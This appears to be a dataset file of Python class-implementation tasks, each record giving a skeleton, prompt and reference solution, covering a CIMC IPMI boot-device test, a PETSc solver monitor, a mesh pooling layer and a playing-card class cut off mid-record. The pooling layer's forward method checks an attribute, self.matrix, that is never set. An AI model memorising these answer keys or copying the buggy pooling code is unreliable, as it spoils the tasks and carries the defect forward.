{"blob_id": "14388c43e0808f12454f282c0f52bea3563b8e96", "bodies": ["log.info('Setup Section verifyProcessorDetails')\nhost_ip = classparam['host_ip']\nboot_order_obj = classparam['boot_order_obj']\nself.host_serial_handle = classparam['host_serial_handle']\nself.host_serial_handle.connect_to_host_serial()\nlog.info('Create boot device from CIMC config and boot from it')\nif boot_order_obj.create_and_config_localhdd_boot_device('HDD') is False:\n self.failed('Failed to create boot device from CIMC')\nlog.info('Waiting for host to boot into respective boot device')\ncimc_util_obj.power_cycle_host()\nres = cimc_util_obj.verify_host_up(hostname=host_ip, wait_for_ping_fail=False)\nif res is False:\n self.failed('Failed to boot from cimc configured boot device')\nelse:\n log.info('Successfully booted from cimc configured boot device')", "expected_out = classparam['expected_out']\nvalidation_string = classparam['validation_string']\nbootdev = parameter\noptions = 'persistent'\ncmd_out = configure_boot_device_ipmi(config, bootdev, options)\nif cmd_out == expected_out + bootdev:\n log.info('Successfully executed, and got expected output: ' + str(cmd_out))\nelse:\n log.error('Failed to get expected command output. Expected was %s, but got as %s' % (expected_out + bootdev, cmd_out))\nlog.info('Validation: connecting host over telnet and verify console logs')\nlog.info('1st Host reboot: Verify that host boots to expected boot device %s' % parameter)\ncimc_util_obj.power_cycle_host()\ncmd = validation_string[parameter]\nlog.info('Expected string is: ' + str(cmd.encode()))\nresult = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\nif result == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\nlog.info('2nd Host Reboot: Verify that host boots again to previously booted boot device %s' % parameter)\ncimc_util_obj.power_cycle_host()\ncmd = validation_string[parameter]\nlog.info('Expected string is: ' + str(cmd.encode()))\nresult2 = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\nif result2 == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\nself.passed('Successfully validated persistent ipmi boot for boot device %s' % parameter)", "self.host_serial_handle.disconnect()\nremove_consistent_ipmi_boot(cimc_util_obj, config)\nlog.info('Cleanup section passed')"], "bodies_text": "<|body_start_0|>\n log.info('Setup Section verifyProcessorDetails')\n host_ip = classparam['host_ip']\n boot_order_obj = classparam['boot_order_obj']\n self.host_serial_handle = classparam['host_serial_handle']\n self.host_serial_handle.connect_to_host_serial()\n log.info('Create boot device from CIMC config and boot from it')\n if boot_order_obj.create_and_config_localhdd_boot_device('HDD') is False:\n self.failed('Failed to create boot device from CIMC')\n log.info('Waiting for host to boot into respective boot device')\n cimc_util_obj.power_cycle_host()\n res = cimc_util_obj.verify_host_up(hostname=host_ip, wait_for_ping_fail=False)\n if res is False:\n self.failed('Failed to boot from cimc configured boot device')\n else:\n log.info('Successfully booted from cimc configured boot device')\n<|end_body_0|>\n\n<|body_start_1|>\n expected_out = classparam['expected_out']\n validation_string = classparam['validation_string']\n bootdev = parameter\n options = 'persistent'\n cmd_out = configure_boot_device_ipmi(config, bootdev, options)\n if cmd_out == expected_out + bootdev:\n log.info('Successfully executed, and got expected output: ' + str(cmd_out))\n else:\n log.error('Failed to get expected command output. Expected was %s, but got as %s' % (expected_out + bootdev, cmd_out))\n log.info('Validation: connecting host over telnet and verify console logs')\n log.info('1st Host reboot: Verify that host boots to expected boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n log.info('2nd Host Reboot: Verify that host boots again to previously booted boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result2 = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result2 == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n self.passed('Successfully validated persistent ipmi boot for boot device %s' % parameter)\n<|end_body_1|>\n\n<|body_start_2|>\n self.host_serial_handle.disconnect()\n remove_consistent_ipmi_boot(cimc_util_obj, config)\n log.info('Cleanup section passed')\n<|end_body_2|>\n", "class_docstring": "Configure boot device to bios, pxe, hdd, cdrom, floppy in persistent mode when boot device created using cimc config and booted from it", "class_name": "CimcConfigIPMICmdPersistentBootDevice", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CimcConfigIPMICmdPersistentBootDevice:\n \"\"\"Configure boot device to bios, pxe, hdd, cdrom, floppy in persistent mode when boot device created using cimc config and booted from it\"\"\"\n\n def setup(self, cimc_util_obj):\n \"\"\"Test Case Setup\"\"\"\n <|body_0|>\n\n def test(self, cimc_util_obj, config, parameter):\n \"\"\"ipmi command to set boot to bios, pxe, hdd, cdrom, floppy drive options in persistent mode when cimc config set and booted from it\"\"\"\n <|body_1|>\n\n def cleanup(self, cimc_util_obj, config):\n \"\"\"Test Case Cleanup\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n log.info('Setup Section verifyProcessorDetails')\n host_ip = classparam['host_ip']\n boot_order_obj = classparam['boot_order_obj']\n self.host_serial_handle = classparam['host_serial_handle']\n self.host_serial_handle.connect_to_host_serial()\n log.info('Create boot device from CIMC config and boot from it')\n if boot_order_obj.create_and_config_localhdd_boot_device('HDD') is False:\n self.failed('Failed to create boot device from CIMC')\n log.info('Waiting for host to boot into respective boot device')\n cimc_util_obj.power_cycle_host()\n res = cimc_util_obj.verify_host_up(hostname=host_ip, wait_for_ping_fail=False)\n if res is False:\n self.failed('Failed to boot from cimc configured boot device')\n else:\n log.info('Successfully booted from cimc configured boot device')\n<|end_body_0|>\n\n<|body_start_1|>\n expected_out = classparam['expected_out']\n validation_string = classparam['validation_string']\n bootdev = parameter\n options = 'persistent'\n cmd_out = configure_boot_device_ipmi(config, bootdev, options)\n if cmd_out == expected_out + bootdev:\n log.info('Successfully executed, and got expected output: ' + str(cmd_out))\n else:\n log.error('Failed to get expected command output. Expected was %s, but got as %s' % (expected_out + bootdev, cmd_out))\n log.info('Validation: connecting host over telnet and verify console logs')\n log.info('1st Host reboot: Verify that host boots to expected boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n log.info('2nd Host Reboot: Verify that host boots again to previously booted boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result2 = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result2 == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n self.passed('Successfully validated persistent ipmi boot for boot device %s' % parameter)\n<|end_body_1|>\n\n<|body_start_2|>\n self.host_serial_handle.disconnect()\n remove_consistent_ipmi_boot(cimc_util_obj, config)\n log.info('Cleanup section passed')\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000000", "length_bytes": 19363, "license_type": "no_license", "methods": [{"docstring": "Test Case Setup", "name": "setup", "signature": "def setup(self, cimc_util_obj)"}, {"docstring": "ipmi command to set boot to bios, pxe, hdd, cdrom, floppy drive options in persistent mode when cimc config set and booted from it", "name": "test", "signature": "def test(self, cimc_util_obj, config, parameter)"}, {"docstring": "Test Case Cleanup", "name": "cleanup", "signature": "def cleanup(self, cimc_util_obj, config)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000981", "prompt": "Implement the Python class `CimcConfigIPMICmdPersistentBootDevice` described below.\n\nClass description:\nConfigure boot device to bios, pxe, hdd, cdrom, floppy in persistent mode when boot device created using cimc config and booted from it\n\nMethod signatures and docstrings:\n- def setup(self, cimc_util_obj): Test Case Setup\n- def test(self, cimc_util_obj, config, parameter): ipmi command to set boot to bios, pxe, hdd, cdrom, floppy drive options in persistent mode when cimc config set and booted from it\n- def cleanup(self, cimc_util_obj, config): Test Case Cleanup", "prompted_full_text": "Implement the Python class `CimcConfigIPMICmdPersistentBootDevice` described below.\n\nClass description:\nConfigure boot device to bios, pxe, hdd, cdrom, floppy in persistent mode when boot device created using cimc config and booted from it\n\nMethod signatures and docstrings:\n- def setup(self, cimc_util_obj): Test Case Setup\n- def test(self, cimc_util_obj, config, parameter): ipmi command to set boot to bios, pxe, hdd, cdrom, floppy drive options in persistent mode when cimc config set and booted from it\n- def cleanup(self, cimc_util_obj, config): Test Case Cleanup\n\n<|skeleton|>\nclass CimcConfigIPMICmdPersistentBootDevice:\n \"\"\"Configure boot device to bios, pxe, hdd, cdrom, floppy in persistent mode when boot device created using cimc config and booted from it\"\"\"\n\n def setup(self, cimc_util_obj):\n \"\"\"Test Case Setup\"\"\"\n <|body_0|>\n\n def test(self, cimc_util_obj, config, parameter):\n \"\"\"ipmi command to set boot to bios, pxe, hdd, cdrom, floppy drive options in persistent mode when cimc config set and booted from it\"\"\"\n <|body_1|>\n\n def cleanup(self, cimc_util_obj, config):\n \"\"\"Test Case Cleanup\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n log.info('Setup Section verifyProcessorDetails')\n host_ip = classparam['host_ip']\n boot_order_obj = classparam['boot_order_obj']\n self.host_serial_handle = classparam['host_serial_handle']\n self.host_serial_handle.connect_to_host_serial()\n log.info('Create boot device from CIMC config and boot from it')\n if boot_order_obj.create_and_config_localhdd_boot_device('HDD') is False:\n self.failed('Failed to create boot device from CIMC')\n log.info('Waiting for host to boot into respective boot device')\n cimc_util_obj.power_cycle_host()\n res = cimc_util_obj.verify_host_up(hostname=host_ip, wait_for_ping_fail=False)\n if res is False:\n self.failed('Failed to boot from cimc configured boot device')\n else:\n log.info('Successfully booted from cimc configured boot device')\n<|end_body_0|>\n\n<|body_start_1|>\n expected_out = classparam['expected_out']\n validation_string = classparam['validation_string']\n bootdev = parameter\n options = 'persistent'\n cmd_out = configure_boot_device_ipmi(config, bootdev, options)\n if cmd_out == expected_out + bootdev:\n log.info('Successfully executed, and got expected output: ' + str(cmd_out))\n else:\n log.error('Failed to get expected command output. Expected was %s, but got as %s' % (expected_out + bootdev, cmd_out))\n log.info('Validation: connecting host over telnet and verify console logs')\n log.info('1st Host reboot: Verify that host boots to expected boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n log.info('2nd Host Reboot: Verify that host boots again to previously booted boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result2 = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result2 == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n self.passed('Successfully validated persistent ipmi boot for boot device %s' % parameter)\n<|end_body_1|>\n\n<|body_start_2|>\n self.host_serial_handle.disconnect()\n remove_consistent_ipmi_boot(cimc_util_obj, config)\n log.info('Cleanup section passed')\n<|end_body_2|>\n", "revision_id": "c255e045a4950a0d8868a10012d5ce6e5c6a9c23", "skeleton": "<|skeleton|>\nclass CimcConfigIPMICmdPersistentBootDevice:\n \"\"\"Configure boot device to bios, pxe, hdd, cdrom, floppy in persistent mode when boot device created using cimc config and booted from it\"\"\"\n\n def setup(self, cimc_util_obj):\n \"\"\"Test Case Setup\"\"\"\n <|body_0|>\n\n def test(self, cimc_util_obj, config, parameter):\n \"\"\"ipmi command to set boot to bios, pxe, hdd, cdrom, floppy drive options in persistent mode when cimc config set and booted from it\"\"\"\n <|body_1|>\n\n def cleanup(self, cimc_util_obj, config):\n \"\"\"Test Case Cleanup\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CimcConfigIPMICmdPersistentBootDevice:\n \"\"\"Configure boot device to bios, pxe, hdd, cdrom, floppy in persistent mode when boot device created using cimc config and booted from it\"\"\"\n\n def setup(self, cimc_util_obj):\n \"\"\"Test Case Setup\"\"\"\n log.info('Setup Section verifyProcessorDetails')\n host_ip = classparam['host_ip']\n boot_order_obj = classparam['boot_order_obj']\n self.host_serial_handle = classparam['host_serial_handle']\n self.host_serial_handle.connect_to_host_serial()\n log.info('Create boot device from CIMC config and boot from it')\n if boot_order_obj.create_and_config_localhdd_boot_device('HDD') is False:\n self.failed('Failed to create boot device from CIMC')\n log.info('Waiting for host to boot into respective boot device')\n cimc_util_obj.power_cycle_host()\n res = cimc_util_obj.verify_host_up(hostname=host_ip, wait_for_ping_fail=False)\n if res is False:\n self.failed('Failed to boot from cimc configured boot device')\n else:\n log.info('Successfully booted from cimc configured boot device')\n\n def test(self, cimc_util_obj, config, parameter):\n \"\"\"ipmi command to set boot to bios, pxe, hdd, cdrom, floppy drive options in persistent mode when cimc config set and booted from it\"\"\"\n expected_out = classparam['expected_out']\n validation_string = classparam['validation_string']\n bootdev = parameter\n options = 'persistent'\n cmd_out = configure_boot_device_ipmi(config, bootdev, options)\n if cmd_out == expected_out + bootdev:\n log.info('Successfully executed, and got expected output: ' + str(cmd_out))\n else:\n log.error('Failed to get expected command output. Expected was %s, but got as %s' % (expected_out + bootdev, cmd_out))\n log.info('Validation: connecting host over telnet and verify console logs')\n log.info('1st Host reboot: Verify that host boots to expected boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n log.info('2nd Host Reboot: Verify that host boots again to previously booted boot device %s' % parameter)\n cimc_util_obj.power_cycle_host()\n cmd = validation_string[parameter]\n log.info('Expected string is: ' + str(cmd.encode()))\n result2 = self.host_serial_handle.validate_host_console_output(exp_string=cmd.encode())\n if result2 == 'Fail':\n self.failed('Failed to validate persistent boot for boot device %s' % parameter)\n self.passed('Successfully validated persistent ipmi boot for boot device %s' % parameter)\n\n def cleanup(self, cimc_util_obj, config):\n \"\"\"Test Case Cleanup\"\"\"\n self.host_serial_handle.disconnect()\n remove_consistent_ipmi_boot(cimc_util_obj, config)\n log.info('Cleanup section passed')\n", "source": "the_stack_v2_python_sparse", "source_path": "ipmi_cmnd_bootorder.py", "source_repo": "jrchanda/MyRepo", "split": "test", "star_events_count": 0} {"blob_id": "68ae12766519a9d97480fc856f792bdf7c9134f0", "bodies": ["self._solver = solver\nself._norm = 1.0\nself._norm0 = 1.0", "if counter == 0 and norm != 0.0:\n self._norm0 = norm\nself._norm = norm\nself._solver._mpi_print(counter, norm, norm / self._norm0)\nself._solver._iter_count += 1"], "bodies_text": "<|body_start_0|>\n self._solver = solver\n self._norm = 1.0\n self._norm0 = 1.0\n<|end_body_0|>\n\n<|body_start_1|>\n if counter == 0 and norm != 0.0:\n self._norm0 = norm\n self._norm = norm\n self._solver._mpi_print(counter, norm, norm / self._norm0)\n self._solver._iter_count += 1\n<|end_body_1|>\n", "class_docstring": "Prints output from PETSc's KSP solvers. Callable object given to KSP as a callback for printing the residual. Attributes ---------- _solver : _solver the openmdao solver. _norm : float the current norm. _norm0 : float the norm for the first iteration.", "class_name": "Monitor", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Monitor:\n \"\"\"Prints output from PETSc's KSP solvers. Callable object given to KSP as a callback for printing the residual. Attributes ---------- _solver : _solver the openmdao solver. _norm : float the current norm. _norm0 : float the norm for the first iteration.\"\"\"\n\n def __init__(self, solver):\n \"\"\"Store pointer to the openmdao solver and initialize norms. Parameters ---------- solver : object the openmdao solver.\"\"\"\n <|body_0|>\n\n def __call__(self, ksp, counter, norm):\n \"\"\"Store norm if first iteration, and print norm. Parameters ---------- ksp : object the KSP solver. counter : int the counter. norm : float the norm.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._solver = solver\n self._norm = 1.0\n self._norm0 = 1.0\n<|end_body_0|>\n\n<|body_start_1|>\n if counter == 0 and norm != 0.0:\n self._norm0 = norm\n self._norm = norm\n self._solver._mpi_print(counter, norm, norm / self._norm0)\n self._solver._iter_count += 1\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000001", "length_bytes": 13874, "license_type": "no_license", "methods": [{"docstring": "Store pointer to the openmdao solver and initialize norms. Parameters ---------- solver : object the openmdao solver.", "name": "__init__", "signature": "def __init__(self, solver)"}, {"docstring": "Store norm if first iteration, and print norm. Parameters ---------- ksp : object the KSP solver. counter : int the counter. norm : float the norm.", "name": "__call__", "signature": "def __call__(self, ksp, counter, norm)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001195", "prompt": "Implement the Python class `Monitor` described below.\n\nClass description:\nPrints output from PETSc's KSP solvers. Callable object given to KSP as a callback for printing the residual. Attributes ---------- _solver : _solver the openmdao solver. _norm : float the current norm. _norm0 : float the norm for the first iteration.\n\nMethod signatures and docstrings:\n- def __init__(self, solver): Store pointer to the openmdao solver and initialize norms. Parameters ---------- solver : object the openmdao solver.\n- def __call__(self, ksp, counter, norm): Store norm if first iteration, and print norm. Parameters ---------- ksp : object the KSP solver. counter : int the counter. norm : float the norm.", "prompted_full_text": "Implement the Python class `Monitor` described below.\n\nClass description:\nPrints output from PETSc's KSP solvers. Callable object given to KSP as a callback for printing the residual. Attributes ---------- _solver : _solver the openmdao solver. _norm : float the current norm. _norm0 : float the norm for the first iteration.\n\nMethod signatures and docstrings:\n- def __init__(self, solver): Store pointer to the openmdao solver and initialize norms. Parameters ---------- solver : object the openmdao solver.\n- def __call__(self, ksp, counter, norm): Store norm if first iteration, and print norm. Parameters ---------- ksp : object the KSP solver. counter : int the counter. norm : float the norm.\n\n<|skeleton|>\nclass Monitor:\n \"\"\"Prints output from PETSc's KSP solvers. Callable object given to KSP as a callback for printing the residual. Attributes ---------- _solver : _solver the openmdao solver. _norm : float the current norm. _norm0 : float the norm for the first iteration.\"\"\"\n\n def __init__(self, solver):\n \"\"\"Store pointer to the openmdao solver and initialize norms. Parameters ---------- solver : object the openmdao solver.\"\"\"\n <|body_0|>\n\n def __call__(self, ksp, counter, norm):\n \"\"\"Store norm if first iteration, and print norm. Parameters ---------- ksp : object the KSP solver. counter : int the counter. norm : float the norm.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._solver = solver\n self._norm = 1.0\n self._norm0 = 1.0\n<|end_body_0|>\n\n<|body_start_1|>\n if counter == 0 and norm != 0.0:\n self._norm0 = norm\n self._norm = norm\n self._solver._mpi_print(counter, norm, norm / self._norm0)\n self._solver._iter_count += 1\n<|end_body_1|>\n", "revision_id": "d9e89fe017f1131d554599c248247f73bb9b534d", "skeleton": "<|skeleton|>\nclass Monitor:\n \"\"\"Prints output from PETSc's KSP solvers. Callable object given to KSP as a callback for printing the residual. Attributes ---------- _solver : _solver the openmdao solver. _norm : float the current norm. _norm0 : float the norm for the first iteration.\"\"\"\n\n def __init__(self, solver):\n \"\"\"Store pointer to the openmdao solver and initialize norms. Parameters ---------- solver : object the openmdao solver.\"\"\"\n <|body_0|>\n\n def __call__(self, ksp, counter, norm):\n \"\"\"Store norm if first iteration, and print norm. Parameters ---------- ksp : object the KSP solver. counter : int the counter. norm : float the norm.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Monitor:\n \"\"\"Prints output from PETSc's KSP solvers. Callable object given to KSP as a callback for printing the residual. Attributes ---------- _solver : _solver the openmdao solver. _norm : float the current norm. _norm0 : float the norm for the first iteration.\"\"\"\n\n def __init__(self, solver):\n \"\"\"Store pointer to the openmdao solver and initialize norms. Parameters ---------- solver : object the openmdao solver.\"\"\"\n self._solver = solver\n self._norm = 1.0\n self._norm0 = 1.0\n\n def __call__(self, ksp, counter, norm):\n \"\"\"Store norm if first iteration, and print norm. Parameters ---------- ksp : object the KSP solver. counter : int the counter. norm : float the norm.\"\"\"\n if counter == 0 and norm != 0.0:\n self._norm0 = norm\n self._norm = norm\n self._solver._mpi_print(counter, norm, norm / self._norm0)\n self._solver._iter_count += 1\n", "source": "the_stack_v2_python_sparse", "source_path": "venv/Lib/site-packages/openmdao/solvers/linear/petsc_ksp.py", "source_repo": "ManojDjs/Heart-rate-estimation", "split": "test", "star_events_count": 1} {"blob_id": "1f45d7634752d535e2fae7d0c26f04eedfae0b39", "bodies": ["super(MeshPooling, self).__init__()\nself.cached = cached\nself.index = index\nself.face = face", "if self.matrix is None or not self.cached:\n self.face, self.index = unsubdivide(x.pos, x.face)[1:]\nx.pos = x.pos[self.index]\nx.norm = x.norm[self.index]\nx.face = self.face\nif len(args) == 0:\n return x\nreturn (x,) + tuple([a[self.index] for a in args])"], "bodies_text": "<|body_start_0|>\n super(MeshPooling, self).__init__()\n self.cached = cached\n self.index = index\n self.face = face\n<|end_body_0|>\n\n<|body_start_1|>\n if self.matrix is None or not self.cached:\n self.face, self.index = unsubdivide(x.pos, x.face)[1:]\n x.pos = x.pos[self.index]\n x.norm = x.norm[self.index]\n x.face = self.face\n if len(args) == 0:\n return x\n return (x,) + tuple([a[self.index] for a in args])\n<|end_body_1|>\n", "class_docstring": "A class representing a mesh pooling layer. It supposes the input mesh is trivially poolable Attributes ---------- cached : bool if True caches the pooling data, otherwise computes it at every input index : LongTensor the vertices indices face : LongTensor the topology tensor Methods ------- forward(x, *args) pools the input data", "class_name": "MeshPooling", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MeshPooling:\n \"\"\"A class representing a mesh pooling layer. It supposes the input mesh is trivially poolable Attributes ---------- cached : bool if True caches the pooling data, otherwise computes it at every input index : LongTensor the vertices indices face : LongTensor the topology tensor Methods ------- forward(x, *args) pools the input data\"\"\"\n\n def __init__(self, index=None, face=None, cached=True):\n \"\"\"Parameters ---------- index : LongTensor (optional) the vertices indices (default is None) face : LongTensor (optional) the topology tensor (default is None) cached : bool (optional) if True caches the pooling data, otherwise computes it at every input (default is True)\"\"\"\n <|body_0|>\n\n def forward(self, x, *args):\n \"\"\"Pools the input data Parameters ---------- x : Data the input mesh with N vertices args : Tensor... optional (N,D,) tensors Returns ------- Data or (Data, Tensor...) the pooled mesh and the other input data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MeshPooling, self).__init__()\n self.cached = cached\n self.index = index\n self.face = face\n<|end_body_0|>\n\n<|body_start_1|>\n if self.matrix is None or not self.cached:\n self.face, self.index = unsubdivide(x.pos, x.face)[1:]\n x.pos = x.pos[self.index]\n x.norm = x.norm[self.index]\n x.face = self.face\n if len(args) == 0:\n return x\n return (x,) + tuple([a[self.index] for a in args])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000002", "length_bytes": 1745, "license_type": "permissive", "methods": [{"docstring": "Parameters ---------- index : LongTensor (optional) the vertices indices (default is None) face : LongTensor (optional) the topology tensor (default is None) cached : bool (optional) if True caches the pooling data, otherwise computes it at every input (default is True)", "name": "__init__", "signature": "def __init__(self, index=None, face=None, cached=True)"}, {"docstring": "Pools the input data Parameters ---------- x : Data the input mesh with N vertices args : Tensor... optional (N,D,) tensors Returns ------- Data or (Data, Tensor...) the pooled mesh and the other input data", "name": "forward", "signature": "def forward(self, x, *args)"}], "n_methods": 2, "prompt": "Implement the Python class `MeshPooling` described below.\n\nClass description:\nA class representing a mesh pooling layer. It supposes the input mesh is trivially poolable Attributes ---------- cached : bool if True caches the pooling data, otherwise computes it at every input index : LongTensor the vertices indices face : LongTensor the topology tensor Methods ------- forward(x, *args) pools the input data\n\nMethod signatures and docstrings:\n- def __init__(self, index=None, face=None, cached=True): Parameters ---------- index : LongTensor (optional) the vertices indices (default is None) face : LongTensor (optional) the topology tensor (default is None) cached : bool (optional) if True caches the pooling data, otherwise computes it at every input (default is True)\n- def forward(self, x, *args): Pools the input data Parameters ---------- x : Data the input mesh with N vertices args : Tensor... optional (N,D,) tensors Returns ------- Data or (Data, Tensor...) the pooled mesh and the other input data", "prompted_full_text": "Implement the Python class `MeshPooling` described below.\n\nClass description:\nA class representing a mesh pooling layer. It supposes the input mesh is trivially poolable Attributes ---------- cached : bool if True caches the pooling data, otherwise computes it at every input index : LongTensor the vertices indices face : LongTensor the topology tensor Methods ------- forward(x, *args) pools the input data\n\nMethod signatures and docstrings:\n- def __init__(self, index=None, face=None, cached=True): Parameters ---------- index : LongTensor (optional) the vertices indices (default is None) face : LongTensor (optional) the topology tensor (default is None) cached : bool (optional) if True caches the pooling data, otherwise computes it at every input (default is True)\n- def forward(self, x, *args): Pools the input data Parameters ---------- x : Data the input mesh with N vertices args : Tensor... optional (N,D,) tensors Returns ------- Data or (Data, Tensor...) the pooled mesh and the other input data\n\n<|skeleton|>\nclass MeshPooling:\n \"\"\"A class representing a mesh pooling layer. It supposes the input mesh is trivially poolable Attributes ---------- cached : bool if True caches the pooling data, otherwise computes it at every input index : LongTensor the vertices indices face : LongTensor the topology tensor Methods ------- forward(x, *args) pools the input data\"\"\"\n\n def __init__(self, index=None, face=None, cached=True):\n \"\"\"Parameters ---------- index : LongTensor (optional) the vertices indices (default is None) face : LongTensor (optional) the topology tensor (default is None) cached : bool (optional) if True caches the pooling data, otherwise computes it at every input (default is True)\"\"\"\n <|body_0|>\n\n def forward(self, x, *args):\n \"\"\"Pools the input data Parameters ---------- x : Data the input mesh with N vertices args : Tensor... optional (N,D,) tensors Returns ------- Data or (Data, Tensor...) the pooled mesh and the other input data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MeshPooling, self).__init__()\n self.cached = cached\n self.index = index\n self.face = face\n<|end_body_0|>\n\n<|body_start_1|>\n if self.matrix is None or not self.cached:\n self.face, self.index = unsubdivide(x.pos, x.face)[1:]\n x.pos = x.pos[self.index]\n x.norm = x.norm[self.index]\n x.face = self.face\n if len(args) == 0:\n return x\n return (x,) + tuple([a[self.index] for a in args])\n<|end_body_1|>\n", "revision_id": "2615b66dd4addfd5c03d9d91a24c7da414294308", "skeleton": "<|skeleton|>\nclass MeshPooling:\n \"\"\"A class representing a mesh pooling layer. It supposes the input mesh is trivially poolable Attributes ---------- cached : bool if True caches the pooling data, otherwise computes it at every input index : LongTensor the vertices indices face : LongTensor the topology tensor Methods ------- forward(x, *args) pools the input data\"\"\"\n\n def __init__(self, index=None, face=None, cached=True):\n \"\"\"Parameters ---------- index : LongTensor (optional) the vertices indices (default is None) face : LongTensor (optional) the topology tensor (default is None) cached : bool (optional) if True caches the pooling data, otherwise computes it at every input (default is True)\"\"\"\n <|body_0|>\n\n def forward(self, x, *args):\n \"\"\"Pools the input data Parameters ---------- x : Data the input mesh with N vertices args : Tensor... optional (N,D,) tensors Returns ------- Data or (Data, Tensor...) the pooled mesh and the other input data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MeshPooling:\n \"\"\"A class representing a mesh pooling layer. It supposes the input mesh is trivially poolable Attributes ---------- cached : bool if True caches the pooling data, otherwise computes it at every input index : LongTensor the vertices indices face : LongTensor the topology tensor Methods ------- forward(x, *args) pools the input data\"\"\"\n\n def __init__(self, index=None, face=None, cached=True):\n \"\"\"Parameters ---------- index : LongTensor (optional) the vertices indices (default is None) face : LongTensor (optional) the topology tensor (default is None) cached : bool (optional) if True caches the pooling data, otherwise computes it at every input (default is True)\"\"\"\n super(MeshPooling, self).__init__()\n self.cached = cached\n self.index = index\n self.face = face\n\n def forward(self, x, *args):\n \"\"\"Pools the input data Parameters ---------- x : Data the input mesh with N vertices args : Tensor... optional (N,D,) tensors Returns ------- Data or (Data, Tensor...) the pooled mesh and the other input data\"\"\"\n if self.matrix is None or not self.cached:\n self.face, self.index = unsubdivide(x.pos, x.face)[1:]\n x.pos = x.pos[self.index]\n x.norm = x.norm[self.index]\n x.face = self.face\n if len(args) == 0:\n return x\n return (x,) + tuple([a[self.index] for a in args])\n", "source": "the_stack_v2_python_sparse", "source_path": "ACME/layer/MeshPooling.py", "source_repo": "mauriziokovacic/ACME", "split": "test", "star_events_count": 3} {"blob_id": "d65eebc3f1048bf5a6a5ef456aed644d44efba4a", "bodies": ["self.value = value\nself.suit = suit\nself.set_name()", "NAMES = {1: 'Ace', 11: 'Jack', 12: 'Queen', 13: 'King'}\nif self.value in NAMES:\n self.name = NAMES[self.value]", "if self.name is not None:\n return '{} of {}'.format(self.name, self.suit)\nreturn '{} of {}'.format(self.value, self.suit)", "if type(self) != type(other):\n return False\nreturn self.value == other.value and self.suit == other.suit"], "bodies_text": "<|body_start_0|>\n self.value = value\n self.suit = suit\n self.set_name()\n<|end_body_0|>\n\n<|body_start_1|>\n NAMES = {1: 'Ace', 11: 'Jack', 12: 'Queen', 13: 'King'}\n if self.value in NAMES:\n self.name = NAMES[self.value]\n<|end_body_1|>\n\n<|body_start_2|>\n if self.name is not None:\n return '{} of {}'.format(self.name, self.suit)\n return '{} of {}'.format(self.value, self.suit)\n<|end_body_2|>\n\n<|body_start_3|>\n if type(self) != type(other):\n return False\n return self.value == other.value and self.suit == other.suit\n<|end_body_3|>\n", "class_docstring": "Class -- PlayingCard Represents a playing card. 